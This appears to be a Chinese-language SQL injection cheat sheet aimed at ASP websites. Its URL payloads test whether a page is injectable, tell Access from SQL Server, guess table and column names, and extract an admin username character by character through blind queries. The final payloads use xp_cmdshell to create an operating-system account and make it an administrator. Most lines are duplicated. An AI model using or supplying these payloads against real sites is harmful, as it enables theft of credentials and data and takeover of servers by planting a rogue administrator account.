判断能否被注入
① http://localhost/showdetail.asp?id=49
② http://localhost/showdetail.asp?id=49 and 1=1
③ http://localhost/showdetail.asp?id=49 and 1=2
① http://localhost/showdetail.asp?id=49
② http://localhost/showdetail.asp?id=49 and 1=1
③ http://localhost/showdetail.asp?id=49 and 1=2
http://localhost/showdetail.asp?id=49 and user>0
判断是ACCESS数据库还是SQL数据库
http://localhost/showdetail.asp?id=49 and (select count(*) from sysobjects)>0--------SQL
http://localhost/showdetail.asp?id=49 and (select count(*) from msysobjects)>0-------ACCESS
http://localhost/showdetail.asp?id=49 and (select count(*) from sysobjects)>0--------SQL
http://localhost/showdetail.asp?id=49 and (select count(*) from msysobjects)>0-------ACCESS
猜表名
http://localhost/showdetail.asp?id=49 and (Select Count(*) from [表名])>=0------------猜表名,如果页面显示正确,则说明存在此表名
http://localhost/showdetail.asp?id=49 and (Select Count(*) from [表名])>=0------------猜表名,如果页面显示正确,则说明存在此表名
猜字段名
http://localhost/showdetail.asp?id=49 and (Select Count([字段名]) from [表名])>=0-----猜字段名,如果页面显示正确,则说明存在此字段名,该方法须在猜中表名后使用
http://localhost/showdetail.asp?id=49 and (Select Count([字段名]) from [表名])>=0-----猜字段名,如果页面显示正确,则说明存在此字段名,该方法须在猜中表名后使用
猜长度
http://localhost/showdetail.asp?id=49 and (select top 1 len(username) from Admin)>N---猜Admin表username字段中,第1条记录的长度N
http://localhost/showdetail.asp?id=49 and (select top 1 len(username) from Admin)>N---猜Admin表username字段中,第1条记录的长度N
猜值的ASCII码值
http://localhost/showdetail.asp?id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>N
http://localhost/showdetail.asp?id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>N
注意的是英文和数字的ASCII码在1-128之间,可以用折半法加速猜解,如果写成程序测试,效率会有极大的提高
执行SQL语句建立用户
http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--
将用户设为管理员
http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--
将用户设为管理员
http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
